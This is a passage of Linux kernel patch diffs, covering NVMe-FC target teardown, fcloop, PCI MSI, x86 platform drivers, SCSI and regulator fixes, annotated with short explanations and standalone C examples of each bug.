+ 
+-	nvmet_fc_delete_target_assoc(assoc);
+-	nvmet_fc_tgt_a_put(assoc);
++	nvmet_fc_delete_assoc(assoc);
++	nvmet_fc_tgtport_put(tgtport);
++}
++
++static void
++nvmet_fc_schedule_delete_assoc(struct nvmet_fc_tgt_assoc *assoc)
++{
++	nvmet_fc_tgtport_get(assoc->tgtport);
++	queue_work(nvmet_wq, &assoc->del_work);
+ }
+ 
+ static struct nvmet_fc_tgt_assoc *
+@@ -1111,6 +1125,9 @@ nvmet_fc_alloc_target_assoc(struct nvmet_fc_tgtport *tgtport, void *hosthandle)
+ 	int idx;
+ 	bool needrandom = true;
+ 
++	if (!tgtport->pe)
++		return NULL;
++
+ 	assoc = kzalloc(sizeof(*assoc), GFP_KERNEL);
+ 	if (!assoc)
+ 		return NULL;
+@@ -1130,7 +1147,7 @@ nvmet_fc_alloc_target_assoc(struct nvmet_fc_tgtport *tgtport, void *hosthandle)
+ 	assoc->a_id = idx;
+ 	INIT_LIST_HEAD(&assoc->a_list);
+ 	kref_init(&assoc->ref);
+-	INIT_WORK(&assoc->del_work, nvmet_fc_delete_assoc);
++	INIT_WORK(&assoc->del_work, nvmet_fc_delete_assoc_work);
+ 	atomic_set(&assoc->terminating, 0);
+ 
+ 	while (needrandom) {
+@@ -1171,13 +1188,18 @@ nvmet_fc_target_assoc_free(struct kref *ref)
+ 	struct nvmet_fc_tgtport *tgtport = assoc->tgtport;
+ 	struct nvmet_fc_ls_iod	*oldls;
+ 	unsigned long flags;
++	int i;
++
++	for (i = NVMET_NR_QUEUES; i >= 0; i--) {
++		if (assoc->queues[i])
++			nvmet_fc_delete_target_queue(assoc->queues[i]);
++	}
+ 
+ 	/* Send Disconnect now that all i/o has completed */
+ 	nvmet_fc_xmt_disconnect_assoc(assoc);
+ 
+ 	nvmet_fc_free_hostport(assoc->hostport);
+ 	spin_lock_irqsave(&tgtport->lock, flags);
+-	list_del_rcu(&assoc->a_list);
+ 	oldls = assoc->rcv_disconn;
+ 	spin_unlock_irqrestore(&tgtport->lock, flags);
+ 	/* if pending Rcv Disconnect Association LS, send rsp now */
+@@ -1207,7 +1229,7 @@ static void
+ nvmet_fc_delete_target_assoc(struct nvmet_fc_tgt_assoc *assoc)
+ {
+ 	struct nvmet_fc_tgtport *tgtport = assoc->tgtport;
+-	struct nvmet_fc_tgt_queue *queue;
++	unsigned long flags;
+ 	int i, terminating;
+ 
+ 	terminating = atomic_xchg(&assoc->terminating, 1);
+@@ -1216,29 +1238,21 @@ nvmet_fc_delete_target_assoc(struct nvmet_fc_tgt_assoc *assoc)
+ 	if (terminating)
+ 		return;
+ 
++	spin_lock_irqsave(&tgtport->lock, flags);
++	list_del_rcu(&assoc->a_list);
++	spin_unlock_irqrestore(&tgtport->lock, flags);
+ 
+-	for (i = NVMET_NR_QUEUES; i >= 0; i--) {
+-		rcu_read_lock();
+-		queue = rcu_dereference(assoc->queues[i]);
+-		if (!queue) {
+-			rcu_read_unlock();
+-			continue;
+-		}
++	synchronize_rcu();
+ 
+-		if (!nvmet_fc_tgt_q_get(queue)) {
+-			rcu_read_unlock();
+-			continue;
+-		}
+-		rcu_read_unlock();
+-		nvmet_fc_delete_target_queue(queue);
+-		nvmet_fc_tgt_q_put(queue);
++	/* ensure all in-flight I/Os have been processed */
++	for (i = NVMET_NR_QUEUES; i >= 0; i--) {
++		if (assoc->queues[i])
++			flush_workqueue(assoc->queues[i]->work_q);
+ 	}
+ 
+ 	dev_info(tgtport->dev,
+ 		"{%d:%d} Association deleted\n",
+ 		tgtport->fc_target_port.port_num, assoc->a_id);
+-
+-	nvmet_fc_tgt_a_put(assoc);
+ }
+ 
+ static struct nvmet_fc_tgt_assoc *
+@@ -1414,6 +1428,7 @@ nvmet_fc_register_targetport(struct nvmet_fc_port_info *pinfo,
+ 	kref_init(&newrec->ref);
+ 	ida_init(&newrec->assoc_cnt);
+ 	newrec->max_sg_cnt = template->max_sgl_segments;
++	INIT_WORK(&newrec->put_work, nvmet_fc_put_tgtport_work);
+ 
+ 	ret = nvmet_fc_alloc_ls_iodlist(newrec);
+ 	if (ret) {
+@@ -1491,9 +1506,8 @@ __nvmet_fc_free_assocs(struct nvmet_fc_tgtport *tgtport)
+ 	list_for_each_entry_rcu(assoc, &tgtport->assoc_list, a_list) {
+ 		if (!nvmet_fc_tgt_a_get(assoc))
+ 			continue;
+-		if (!queue_work(nvmet_wq, &assoc->del_work))
+-			/* already deleting - release local reference */
+-			nvmet_fc_tgt_a_put(assoc);
++		nvmet_fc_schedule_delete_assoc(assoc);
++		nvmet_fc_tgt_a_put(assoc);
+ 	}
+ 	rcu_read_unlock();
+ }
+@@ -1546,9 +1560,8 @@ nvmet_fc_invalidate_host(struct nvmet_fc_target_port *target_port,
+ 			continue;
+ 		assoc->hostport->invalid = 1;
+ 		noassoc = false;
+-		if (!queue_work(nvmet_wq, &assoc->del_work))
+-			/* already deleting - release local reference */
+-			nvmet_fc_tgt_a_put(assoc);
++		nvmet_fc_schedule_delete_assoc(assoc);
++		nvmet_fc_tgt_a_put(assoc);
+ 	}
+ 	spin_unlock_irqrestore(&tgtport->lock, flags);
+ 
+@@ -1580,7 +1593,7 @@ nvmet_fc_delete_ctrl(struct nvmet_ctrl *ctrl)
+ 
+ 		rcu_read_lock();
+ 		list_for_each_entry_rcu(assoc, &tgtport->assoc_list, a_list) {
+-			queue = rcu_dereference(assoc->queues[0]);
++			queue = assoc->queues[0];
+ 			if (queue && queue->nvme_sq.ctrl == ctrl) {
+ 				if (nvmet_fc_tgt_a_get(assoc))
+ 					found_ctrl = true;
+@@ -1592,9 +1605,8 @@ nvmet_fc_delete_ctrl(struct nvmet_ctrl *ctrl)
+ 		nvmet_fc_tgtport_put(tgtport);
+ 
+ 		if (found_ctrl) {
+-			if (!queue_work(nvmet_wq, &assoc->del_work))
+-				/* already deleting - release local reference */
+-				nvmet_fc_tgt_a_put(assoc);
++			nvmet_fc_schedule_delete_assoc(assoc);
++			nvmet_fc_tgt_a_put(assoc);
+ 			return;
+ 		}
+ 
+@@ -1624,6 +1636,8 @@ nvmet_fc_unregister_targetport(struct nvmet_fc_target_port *target_port)
+ 	/* terminate any outstanding associations */
+ 	__nvmet_fc_free_assocs(tgtport);
+ 
++	flush_workqueue(nvmet_wq);
++
+ 	/*
+ 	 * should terminate LS's as well. However, LS's will be generated
+ 	 * at the tail end of association termination, so they likely don't
+@@ -1869,9 +1883,6 @@ nvmet_fc_ls_disconnect(struct nvmet_fc_tgtport *tgtport,
+ 				sizeof(struct fcnvme_ls_disconnect_assoc_acc)),
+ 			FCNVME_LS_DISCONNECT_ASSOC);
+ 
+-	/* release get taken in nvmet_fc_find_target_assoc */
+-	nvmet_fc_tgt_a_put(assoc);
+-
+ 	/*
+ 	 * The rules for LS response says the response cannot
+ 	 * go back until ABTS's have been sent for all outstanding
+@@ -1886,8 +1897,6 @@ nvmet_fc_ls_disconnect(struct nvmet_fc_tgtport *tgtport,
+ 	assoc->rcv_disconn = iod;
+ 	spin_unlock_irqrestore(&tgtport->lock, flags);
+ 
+-	nvmet_fc_delete_target_assoc(assoc);
+-
+ 	if (oldls) {
+ 		dev_info(tgtport->dev,
+ 			"{%d:%d} Multiple Disconnect Association LS's "
+@@ -1903,6 +1912,9 @@ nvmet_fc_ls_disconnect(struct nvmet_fc_tgtport *tgtport,
+ 		nvmet_fc_xmt_ls_rsp(tgtport, oldls);
+ 	}
+ 
++	nvmet_fc_schedule_delete_assoc(assoc);
++	nvmet_fc_tgt_a_put(assoc);
++
+ 	return false;
+ }
+ 
+@@ -2539,8 +2551,9 @@ nvmet_fc_handle_fcp_rqst(struct nvmet_fc_tgtport *tgtport,
+ 
+ 	fod->req.cmd = &fod->cmdiubuf.sqe;
+ 	fod->req.cqe = &fod->rspiubuf.cqe;
+-	if (tgtport->pe)
+-		fod->req.port = tgtport->pe->port;
++	if (!tgtport->pe)
++		goto transport_error;
++	fod->req.port = tgtport->pe->port;
+ 
+ 	/* clear any response payload */
+ 	memset(&fod->rspiubuf, 0, sizeof(fod->rspiubuf));
+@@ -2901,6 +2914,9 @@ nvmet_fc_remove_port(struct nvmet_port *port)
+ 
+ 	nvmet_fc_portentry_unbind(pe);
+ 
++	/* terminate any outstanding associations */
++	__nvmet_fc_free_assocs(pe->tgtport);
++
+ 	kfree(pe);
+ }
+ 
+@@ -2932,6 +2948,9 @@ static int __init nvmet_fc_init_module(void)
+ 
+ static void __exit nvmet_fc_exit_module(void)
+ {
++	/* ensure any shutdown operations, e.g. controller deletes, have finished */
++	flush_workqueue(nvmet_wq);
++
+ 	/* sanity check - all lports should be removed */
+ 	if (!list_empty(&nvmet_fc_target_list))
+ 		pr_warn("%s: targetport list not empty\n", __func__);
+diff --git a/drivers/nvme/target/fcloop.c b/drivers/nvme/target/fcloop.c
+index c780af36c1d4a..f5b8442b653db 100644
+--- a/drivers/nvme/target/fcloop.c
++++ b/drivers/nvme/target/fcloop.c
+@@ -358,7 +358,7 @@ fcloop_h2t_ls_req(struct nvme_fc_local_port *localport,
+ 	if (!rport->targetport) {
+ 		tls_req->status = -ECONNREFUSED;
+ 		spin_lock(&rport->lock);
+-		list_add_tail(&rport->ls_list, &tls_req->ls_list);
++		list_add_tail(&tls_req->ls_list, &rport->ls_list);
+ 		spin_unlock(&rport->lock);
+ 		queue_work(nvmet_wq, &rport->ls_work);
+ 		return ret;
+@@ -391,7 +391,7 @@ fcloop_h2t_xmt_ls_rsp(struct nvmet_fc_target_port *targetport,
+ 	if (remoteport) {
+ 		rport = remoteport->private;
+ 		spin_lock(&rport->lock);
+-		list_add_tail(&rport->ls_list, &tls_req->ls_list);
++		list_add_tail(&tls_req->ls_list, &rport->ls_list);
+ 		spin_unlock(&rport->lock);
+ 		queue_work(nvmet_wq, &rport->ls_work);
+ 	}
+@@ -446,7 +446,7 @@ fcloop_t2h_ls_req(struct nvmet_fc_target_port *targetport, void *hosthandle,
+ 	if (!tport->remoteport) {
+ 		tls_req->status = -ECONNREFUSED;
+ 		spin_lock(&tport->lock);
+-		list_add_tail(&tport->ls_list, &tls_req->ls_list);
++		list_add_tail(&tls_req->ls_list, &tport->ls_list);
+ 		spin_unlock(&tport->lock);
+ 		queue_work(nvmet_wq, &tport->ls_work);
+ 		return ret;
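
The fcloop fix swaps the arguments of list_add_tail(): the kernel helper takes the new entry first and the list head second, and calling it the other way round splices the head onto the entry instead of queueing the entry. Re-implementing just enough of the circular-list idiom to show the correct call:

#include <stdio.h>

struct list_head { struct list_head *next, *prev; };

#define LIST_HEAD_INIT(n) { &(n), &(n) }

static void list_add_tail(struct list_head *new, struct list_head *head)
{
	new->prev = head->prev;
	new->next = head;
	head->prev->next = new;
	head->prev = new;
}

int main(void)
{
	struct list_head head = LIST_HEAD_INIT(head);
	struct list_head req1 = LIST_HEAD_INIT(req1);
	struct list_head req2 = LIST_HEAD_INIT(req2);
	struct list_head *p;
	int n = 0;

	list_add_tail(&req1, &head);	/* correct: entry first, head second */
	list_add_tail(&req2, &head);	/* swapping them would corrupt head */

	for (p = head.next; p != &head; p = p->next)
		n++;
	printf("%d entries queued\n", n);	/* 2 */
	return 0;
}
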
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index ce42afe8f64ef..3480768274699 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -1884,6 +1884,7 @@ static void __exit nvmet_tcp_exit(void)
+ 	flush_workqueue(nvmet_wq);
+ 
+ 	destroy_workqueue(nvmet_tcp_wq);
++	ida_destroy(&nvmet_tcp_queue_ida);
+ }
+ 
+ module_init(nvmet_tcp_init);
+diff --git a/drivers/pci/controller/dwc/pcie-designware-ep.c b/drivers/pci/controller/dwc/pcie-designware-ep.c
+index 59c164b5c64aa..4086a7818981a 100644
+--- a/drivers/pci/controller/dwc/pcie-designware-ep.c
++++ b/drivers/pci/controller/dwc/pcie-designware-ep.c
+@@ -6,6 +6,7 @@
+  * Author: Kishon Vijay Abraham I <kishon@ti.com>
+  */
+ 
++#include <linux/align.h>
+ #include <linux/of.h>
+ #include <linux/platform_device.h>
+ 
+@@ -600,7 +601,7 @@ int dw_pcie_ep_raise_msix_irq(struct dw_pcie_ep *ep, u8 func_no,
+ 	}
+ 
+ 	aligned_offset = msg_addr & (epc->mem->window.page_size - 1);
+-	msg_addr &= ~aligned_offset;
++	msg_addr = ALIGN_DOWN(msg_addr, epc->mem->window.page_size);
+ 	ret = dw_pcie_ep_map_addr(epc, func_no, 0, ep->msi_mem_phys, msg_addr,
+ 				  epc->mem->window.page_size);
+ 	if (ret)
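
The dwc hunk expresses the round-down with ALIGN_DOWN() rather than an open-coded mask, making the map-window-then-offset intent explicit. The usual pattern, round the target down to the window granularity, map the window, then access base plus offset, in a standalone sketch (power-of-two granularity assumed):

#include <stdio.h>
#include <stdint.h>

#define ALIGN_DOWN(x, a) ((x) & ~((uint64_t)(a) - 1))	/* a: power of two */

int main(void)
{
	uint64_t page_size = 0x1000;		/* window granularity */
	uint64_t msg_addr  = 0x12345A50;	/* target address to reach */

	uint64_t offset = msg_addr & (page_size - 1);		/* 0xA50 */
	uint64_t base   = ALIGN_DOWN(msg_addr, page_size);	/* 0x12345000 */

	/* map the window at 'base', then write at 'base + offset' */
	printf("map %#llx, write at +%#llx\n",
	       (unsigned long long)base, (unsigned long long)offset);
	return 0;
}
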
+diff --git a/drivers/pci/msi/irqdomain.c b/drivers/pci/msi/irqdomain.c
+index e9cf318e6670f..34877a1f43a15 100644
+--- a/drivers/pci/msi/irqdomain.c
++++ b/drivers/pci/msi/irqdomain.c
+@@ -60,7 +60,7 @@ static irq_hw_number_t pci_msi_domain_calc_hwirq(struct msi_desc *desc)
+ 
+ 	return (irq_hw_number_t)desc->msi_index |
+ 		pci_dev_id(dev) << 11 |
+-		(pci_domain_nr(dev->bus) & 0xFFFFFFFF) << 27;
++		((irq_hw_number_t)(pci_domain_nr(dev->bus) & 0xFFFFFFFF)) << 27;
+ }
+ 
+ static inline bool pci_msi_desc_is_multi_msi(struct msi_desc *desc)
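
The MSI hunk casts to irq_hw_number_t before shifting: pci_domain_nr() yields a 32-bit value, so shifting it left by 27 in 32-bit arithmetic discards all but its low 5 bits before the result is widened. A self-contained demonstration:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
	uint32_t domain = 0x00010000;	/* a PCI domain number above 31 */

	/* buggy: the shift happens in 32 bits, bit 16 lands past bit 31 */
	uint64_t lost = (domain & 0xFFFFFFFFu) << 27;
	/* fixed: widen to 64 bits first, then shift */
	uint64_t kept = ((uint64_t)(domain & 0xFFFFFFFFu)) << 27;

	printf("lost = %#llx\n", (unsigned long long)lost);	/* 0 */
	printf("kept = %#llx\n", (unsigned long long)kept);	/* 0x80000000000 */
	return 0;
}
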
+diff --git a/drivers/platform/x86/intel/vbtn.c b/drivers/platform/x86/intel/vbtn.c
+index 8e2b07ed2ce94..c10c99a31a90a 100644
+--- a/drivers/platform/x86/intel/vbtn.c
++++ b/drivers/platform/x86/intel/vbtn.c
+@@ -200,9 +200,6 @@ static void notify_handler(acpi_handle handle, u32 event, void *context)
+ 	autorelease = val && (!ke_rel || ke_rel->type == KE_IGNORE);
+ 
+ 	sparse_keymap_report_event(input_dev, event, val, autorelease);
+-
+-	/* Some devices need this to report further events */
+-	acpi_evaluate_object(handle, "VBDL", NULL, NULL);
+ }
+ 
+ /*
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 6edd2e294750e..c2fb19af10705 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -10511,6 +10511,7 @@ static int convert_dytc_to_profile(int funcmode, int dytcmode,
+ 		return 0;
+ 	default:
+ 		/* Unknown function */
++		pr_debug("unknown function 0x%x\n", funcmode);
+ 		return -EOPNOTSUPP;
+ 	}
+ 	return 0;
+@@ -10696,8 +10697,8 @@ static void dytc_profile_refresh(void)
+ 		return;
+ 
+ 	perfmode = (output >> DYTC_GET_MODE_BIT) & 0xF;
+-	convert_dytc_to_profile(funcmode, perfmode, &profile);
+-	if (profile != dytc_current_profile) {
++	err = convert_dytc_to_profile(funcmode, perfmode, &profile);
++	if (!err && profile != dytc_current_profile) {
+ 		dytc_current_profile = profile;
+ 		platform_profile_notify();
+ 	}
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index 9a92d515abb9b..11d72a3533552 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -50,7 +50,7 @@ static const struct property_entry chuwi_hi8_air_props[] = {
+ };
+ 
+ static const struct ts_dmi_data chuwi_hi8_air_data = {
+-	.acpi_name	= "MSSL1680:00",
++	.acpi_name	= "MSSL1680",
+ 	.properties	= chuwi_hi8_air_props,
+ };
+ 
+@@ -913,6 +913,32 @@ static const struct ts_dmi_data teclast_tbook11_data = {
+ 	.properties	= teclast_tbook11_props,
+ };
+ 
++static const struct property_entry teclast_x16_plus_props[] = {
++	PROPERTY_ENTRY_U32("touchscreen-min-x", 8),
++	PROPERTY_ENTRY_U32("touchscreen-min-y", 14),
++	PROPERTY_ENTRY_U32("touchscreen-size-x", 1916),
++	PROPERTY_ENTRY_U32("touchscreen-size-y", 1264),
++	PROPERTY_ENTRY_BOOL("touchscreen-inverted-y"),
++	PROPERTY_ENTRY_STRING("firmware-name", "gsl3692-teclast-x16-plus.fw"),
++	PROPERTY_ENTRY_U32("silead,max-fingers", 10),
++	PROPERTY_ENTRY_BOOL("silead,home-button"),
++	{ }
++};
++
++static const struct ts_dmi_data teclast_x16_plus_data = {
++	.embedded_fw = {
++		.name	= "silead/gsl3692-teclast-x16-plus.fw",
++		.prefix = { 0xf0, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00 },
++		.length	= 43560,
++		.sha256	= { 0x9d, 0xb0, 0x3d, 0xf1, 0x00, 0x3c, 0xb5, 0x25,
++			    0x62, 0x8a, 0xa0, 0x93, 0x4b, 0xe0, 0x4e, 0x75,
++			    0xd1, 0x27, 0xb1, 0x65, 0x3c, 0xba, 0xa5, 0x0f,
++			    0xcd, 0xb4, 0xbe, 0x00, 0xbb, 0xf6, 0x43, 0x29 },
++	},
++	.acpi_name	= "MSSL1680:00",
++	.properties	= teclast_x16_plus_props,
++};
++
+ static const struct property_entry teclast_x3_plus_props[] = {
+ 	PROPERTY_ENTRY_U32("touchscreen-size-x", 1980),
+ 	PROPERTY_ENTRY_U32("touchscreen-size-y", 1500),
+@@ -1567,6 +1593,15 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_SKU, "E5A6_A1"),
+ 		},
+ 	},
++	{
++		/* Teclast X16 Plus */
++		.driver_data = (void *)&teclast_x16_plus_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "TECLAST"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Default string"),
++			DMI_MATCH(DMI_PRODUCT_SKU, "D3A5_A1"),
++		},
++	},
+ 	{
+ 		/* Teclast X3 Plus */
+ 		.driver_data = (void *)&teclast_x3_plus_data,
+@@ -1741,7 +1776,7 @@ static void ts_dmi_add_props(struct i2c_client *client)
+ 	int error;
+ 
+ 	if (has_acpi_companion(dev) &&
+-	    !strncmp(ts_data->acpi_name, client->name, I2C_NAME_SIZE)) {
++	    strstarts(client->name, ts_data->acpi_name)) {
+ 		error = device_create_managed_software_node(dev, ts_data->properties, NULL);
+ 		if (error)
+ 			dev_err(dev, "failed to add properties: %d\n", error);
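
Switching from strncmp() over the full client name to strstarts() makes the
quirk match any instance suffix, so an acpi_name of "MSSL1680" now covers
clients named "MSSL1680:00" and "MSSL1680:01" alike. A user-space sketch
using the kernel's one-line definition of strstarts():

#include <stdio.h>
#include <string.h>

/* strstarts() as defined in the kernel: does str begin with prefix? */
static int strstarts(const char *str, const char *prefix)
{
	return strncmp(str, prefix, strlen(prefix)) == 0;
}

int main(void)
{
	printf("%d\n", strstarts("MSSL1680:00", "MSSL1680")); /* 1 */
	printf("%d\n", strstarts("MSSL1680:01", "MSSL1680")); /* 1 */
	printf("%d\n", strstarts("SILEAD:00", "MSSL1680"));   /* 0 */
	return 0;
}
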
+diff --git a/drivers/regulator/pwm-regulator.c b/drivers/regulator/pwm-regulator.c
+index b9eeaff1c6615..925e486f73a6d 100644
+--- a/drivers/regulator/pwm-regulator.c
++++ b/drivers/regulator/pwm-regulator.c
+@@ -158,6 +158,9 @@ static int pwm_regulator_get_voltage(struct regulator_dev *rdev)
+ 	pwm_get_state(drvdata->pwm, &pstate);
+ 
+ 	voltage = pwm_get_relative_duty_cycle(&pstate, duty_unit);
++	if (voltage < min(max_uV_duty, min_uV_duty) ||
++	    voltage > max(max_uV_duty, min_uV_duty))
++		return -ENOTRECOVERABLE;
+ 
+ 	/*
+ 	 * The dutycycle for min_uV might be greater than the one for max_uV.
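
The added range check uses min()/max() of the two duty-cycle bounds
because, as the comment right below notes, an inverted regulator can map
min_uV to the larger duty cycle. A simplified integer sketch (hypothetical
duty values) of the order-independent window test:

#include <stdio.h>

#define MIN(a, b) ((a) < (b) ? (a) : (b))
#define MAX(a, b) ((a) > (b) ? (a) : (b))

static int duty_valid(int duty, int min_uV_duty, int max_uV_duty)
{
	return duty >= MIN(max_uV_duty, min_uV_duty) &&
	       duty <= MAX(max_uV_duty, min_uV_duty);
}

int main(void)
{
	/* Inverted regulator: 90% duty = min voltage, 10% duty = max. */
	printf("%d\n", duty_valid(50, 90, 10)); /* 1: inside the window */
	printf("%d\n", duty_valid(95, 90, 10)); /* 0: out-of-range duty */
	return 0;
}
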
+diff --git a/drivers/s390/cio/device_ops.c b/drivers/s390/cio/device_ops.c
+index c533d1dadc6bb..a5dba3829769c 100644
+--- a/drivers/s390/cio/device_ops.c
++++ b/drivers/s390/cio/device_ops.c
+@@ -202,7 +202,8 @@ int ccw_device_start_timeout_key(struct ccw_device *cdev, struct ccw1 *cpa,
+ 		return -EINVAL;
+ 	if (cdev->private->state == DEV_STATE_NOT_OPER)
+ 		return -ENODEV;
+-	if (cdev->private->state == DEV_STATE_VERIFY) {
++	if (cdev->private->state == DEV_STATE_VERIFY ||
++	    cdev->private->flags.doverify) {
+ 		/* Remember to fake irb when finished. */
+ 		if (!cdev->private->flags.fake_irb) {
+ 			cdev->private->flags.fake_irb = FAKE_CMD_IRB;
+@@ -214,8 +215,7 @@ int ccw_device_start_timeout_key(struct ccw_device *cdev, struct ccw1 *cpa,
+ 	}
+ 	if (cdev->private->state != DEV_STATE_ONLINE ||
+ 	    ((sch->schib.scsw.cmd.stctl & SCSW_STCTL_PRIM_STATUS) &&
+-	     !(sch->schib.scsw.cmd.stctl & SCSW_STCTL_SEC_STATUS)) ||
+-	    cdev->private->flags.doverify)
++	     !(sch->schib.scsw.cmd.stctl & SCSW_STCTL_SEC_STATUS)))
+ 		return -EBUSY;
+ 	ret = cio_set_options (sch, flags);
+ 	if (ret)
+diff --git a/drivers/scsi/Kconfig b/drivers/scsi/Kconfig
+index 03e71e3d5e5b3..3b990cf2c1954 100644
+--- a/drivers/scsi/Kconfig
++++ b/drivers/scsi/Kconfig
+@@ -1285,7 +1285,7 @@ source "drivers/scsi/arm/Kconfig"
+ 
+ config JAZZ_ESP
+ 	bool "MIPS JAZZ FAS216 SCSI support"
+-	depends on MACH_JAZZ && SCSI
++	depends on MACH_JAZZ && SCSI=y
+ 	select SCSI_SPI_ATTRS
+ 	help
+ 	  This is the driver for the onboard SCSI host adapter of MIPS Magnum
+diff --git a/drivers/scsi/lpfc/lpfc_scsi.c b/drivers/scsi/lpfc/lpfc_scsi.c
+index 7aac9fc719675..0bb7e164b525f 100644
+--- a/drivers/scsi/lpfc/lpfc_scsi.c
++++ b/drivers/scsi/lpfc/lpfc_scsi.c
+@@ -1919,7 +1919,7 @@ lpfc_bg_setup_bpl_prot(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+  *
+  * Returns the number of SGEs added to the SGL.
+  **/
+-static int
++static uint32_t
+ lpfc_bg_setup_sgl(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 		struct sli4_sge *sgl, int datasegcnt,
+ 		struct lpfc_io_buf *lpfc_cmd)
+@@ -1927,8 +1927,8 @@ lpfc_bg_setup_sgl(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 	struct scatterlist *sgde = NULL; /* s/g data entry */
+ 	struct sli4_sge_diseed *diseed = NULL;
+ 	dma_addr_t physaddr;
+-	int i = 0, num_sge = 0, status;
+-	uint32_t reftag;
++	int i = 0, status;
++	uint32_t reftag, num_sge = 0;
+ 	uint8_t txop, rxop;
+ #ifdef CONFIG_SCSI_LPFC_DEBUG_FS
+ 	uint32_t rc;
+@@ -2100,7 +2100,7 @@ lpfc_bg_setup_sgl(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+  *
+  * Returns the number of SGEs added to the SGL.
+  **/
+-static int
++static uint32_t
+ lpfc_bg_setup_sgl_prot(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 		struct sli4_sge *sgl, int datacnt, int protcnt,
+ 		struct lpfc_io_buf *lpfc_cmd)
+@@ -2124,8 +2124,8 @@ lpfc_bg_setup_sgl_prot(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 	uint32_t rc;
+ #endif
+ 	uint32_t checking = 1;
+-	uint32_t dma_offset = 0;
+-	int num_sge = 0, j = 2;
++	uint32_t dma_offset = 0, num_sge = 0;
++	int j = 2;
+ 	struct sli4_hybrid_sgl *sgl_xtra = NULL;
+ 
+ 	sgpe = scsi_prot_sglist(sc);
+diff --git a/drivers/scsi/scsi.c b/drivers/scsi/scsi.c
+index 3cda5d26b66ca..e70ab8db30142 100644
+--- a/drivers/scsi/scsi.c
++++ b/drivers/scsi/scsi.c
+@@ -328,21 +328,39 @@ static int scsi_vpd_inquiry(struct scsi_device *sdev, unsigned char *buffer,
+ 	return result + 4;
+ }
+ 
++enum scsi_vpd_parameters {
++	SCSI_VPD_HEADER_SIZE = 4,
++	SCSI_VPD_LIST_SIZE = 36,
++};
++
+ static int scsi_get_vpd_size(struct scsi_device *sdev, u8 page)
+ {
+-	unsigned char vpd_header[SCSI_VPD_HEADER_SIZE] __aligned(4);
++	unsigned char vpd[SCSI_VPD_LIST_SIZE] __aligned(4);
+ 	int result;
+ 
+ 	if (sdev->no_vpd_size)
+ 		return SCSI_DEFAULT_VPD_LEN;
+ 
++	/*
++	 * Fetch the supported pages VPD and validate that the requested page
++	 * number is present.
++	 */
++	if (page != 0) {
++		result = scsi_vpd_inquiry(sdev, vpd, 0, sizeof(vpd));
++		if (result < SCSI_VPD_HEADER_SIZE)
++			return 0;
++
++		result -= SCSI_VPD_HEADER_SIZE;
++		if (!memchr(&vpd[SCSI_VPD_HEADER_SIZE], page, result))
++			return 0;
++	}
+ 	/*
+ 	 * Fetch the VPD page header to find out how big the page
+ 	 * is. This is done to prevent problems on legacy devices
+ 	 * which can not handle allocation lengths as large as
+ 	 * potentially requested by the caller.
+ 	 */
+-	result = scsi_vpd_inquiry(sdev, vpd_header, page, sizeof(vpd_header));
++	result = scsi_vpd_inquiry(sdev, vpd, page, SCSI_VPD_HEADER_SIZE);
+ 	if (result < 0)
+ 		return 0;
+ 
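
The added pre-check reads the "Supported VPD Pages" list (page 0) before
asking for a specific page, so legacy devices that mishandle unknown page
codes are never queried for them. A sketch against a made-up response
buffer (real responses carry the list length in the 4-byte header):

#include <stdio.h>
#include <string.h>

#define VPD_HEADER_SIZE 4

int main(void)
{
	/* Hypothetical page-0 response: 4-byte header, then page codes. */
	unsigned char vpd[] = { 0x00, 0x00, 0x00, 0x03, 0x00, 0x80, 0x83 };
	int result = sizeof(vpd); /* what the INQUIRY returned */
	unsigned char page = 0x83;

	result -= VPD_HEADER_SIZE;
	if (memchr(&vpd[VPD_HEADER_SIZE], page, result))
		printf("page %#x supported\n", page);
	else
		printf("page %#x not supported\n", page);
	return 0;
}
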
+diff --git a/drivers/scsi/smartpqi/smartpqi_init.c b/drivers/scsi/smartpqi/smartpqi_init.c
+index 47d487729635c..e44f6bb25a8ea 100644
+--- a/drivers/scsi/smartpqi/smartpqi_init.c
++++ b/drivers/scsi/smartpqi/smartpqi_init.c
+@@ -6449,8 +6449,11 @@ static void pqi_map_queues(struct Scsi_Host *shost)
+ {
+ 	struct pqi_ctrl_info *ctrl_info = shost_to_hba(shost);
+ 
+-	blk_mq_pci_map_queues(&shost->tag_set.map[HCTX_TYPE_DEFAULT],
++	if (!ctrl_info->disable_managed_interrupts)
++		return blk_mq_pci_map_queues(&shost->tag_set.map[HCTX_TYPE_DEFAULT],
+ 			      ctrl_info->pci_dev, 0);
++	else
++		return blk_mq_map_queues(&shost->tag_set.map[HCTX_TYPE_DEFAULT]);
+ }
+ 
+ static inline bool pqi_is_tape_changer_device(struct pqi_scsi_dev *device)
+diff --git a/drivers/soc/mediatek/mtk-pm-domains.c b/drivers/soc/mediatek/mtk-pm-domains.c
+index 474b272f9b02d..832adb570b501 100644
+--- a/drivers/soc/mediatek/mtk-pm-domains.c
++++ b/drivers/soc/mediatek/mtk-pm-domains.c
+@@ -499,6 +499,11 @@ static int scpsys_add_subdomain(struct scpsys *scpsys, struct device_node *paren
+ 			goto err_put_node;
+ 		}
+ 
++		/* recursive call to add all subdomains */
++		ret = scpsys_add_subdomain(scpsys, child);
++		if (ret)
++			goto err_put_node;
++
+ 		ret = pm_genpd_add_subdomain(parent_pd, child_pd);
+ 		if (ret) {
+ 			dev_err(scpsys->dev, "failed to add %s subdomain to parent %s\n",
